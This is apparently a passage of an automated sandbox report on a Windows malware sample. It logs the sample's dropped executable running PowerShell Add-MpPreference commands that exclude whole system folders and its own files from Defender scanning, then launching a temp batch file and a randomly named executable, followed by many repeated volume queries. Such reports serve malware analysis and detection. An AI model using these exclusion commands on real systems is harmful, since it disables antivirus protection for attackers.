                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028F654 cpuid 0_2_0028F654
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0028AF0F
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeQueries volume information: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
